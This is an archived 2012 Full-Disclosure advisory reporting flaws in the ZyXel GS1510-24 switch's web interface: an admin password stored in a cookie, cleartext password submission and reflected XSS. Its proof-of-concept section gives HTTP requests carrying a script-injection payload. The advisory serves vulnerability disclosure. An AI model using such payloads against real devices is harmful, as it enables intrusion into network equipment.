| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 13 Mar 2012 22:14:13 +0000
From: upsploit advisories <upsploitadvisories@...ploit.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Multiple vulnerabilities in ZyXel GS1510 web
front end
*Advisory Information*
Title: Multiple vulnerabilities in ZyXel GS1510 web front end
Date published: 2012-03-14 12:57:15 AM
upSploit Ref: UPS-2011-0042
*Advisory Summary*
IT Security Geeks have discovered multiple vulnerabilities in the ZyXel
1510 24-port Ethernet switch, these include Admin password stored in
Cookie, reflected Cross-Site Scripting (XSS), and clear-text password
submission.
*Vendor*
Zyxel
*Affected Software*
V1.00(BVN.1)
This is the firmware that runs on the ZyXel model GS1510-24 switch.
*Description of Issue*
The GS1510-24 ZyXel switch, running firmware V1.00(BVN.1), is susceptible
to multiple vulnerabilities, these are all within the management web
interface, and are as follows:
1. The management web interface Cookie contains both the username and the
password for the Admin user to log into the switch.
2. Cleartext submission of password. The page contains a form with the
following action URL, which is submitted over clear-text HTTP:
http://192.168.1.5/webctrl.cgi
The form contains the following password field:
password
3. Cross Site Scripting
The payload fe07b</title><script>alert(xss)</ script>b7e71e54af6 was
submitted in the name of an arbitrarily supplied request parameter.
This input was echoed unmodified in the application’s response.
*PoC*
2. Cleartext submission of password.
http://192.168.1.5/webctrl.cgi
Request
GET /login.htm HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1)
AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cache-Control: max-age=0
SSSSSSS: UUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: admin=password123
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive
3. Cross Site Scripting
The payload fe07b</title><script>alert(1)</
script>b7e71e54af6 was submitted in the name of an arbitrarily supplied
request parameter.
This input was echoed unmodified in the application’s response.
This proof-of-concept attack demonstrates that it is possible to inject
arbitrary JavaScript into the application’s response.
Request
GET
/images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1
HTTP/1.1 Host: 192.168.1.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection:
close
Cookie: admin=password123
Response
HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003 Content-Type: text/html; charset=iso-8859-1
Date: Sun, 18 Sep 2011 16:30:14 GMT Last-Modified: Sat, 01 Jan 2000
00:00:03 GMT Accept-Ranges: bytes
Connection: close
<HTML>
<HEAD><TITLE>Index of
/images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1</TITLE></HEAD>
<BODY BGCOLOR="#99cc99" TEXT="#000000"
LINK="#2020ff" VLINK="#4040cc">
<H2>Index of /images/?fe
...[SNIP]...
*Credits*
Neil Fryer/IT Security Geeks
*References*
ZyXel GS1510
*Patch/Fix*
Update to the latest firmware
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists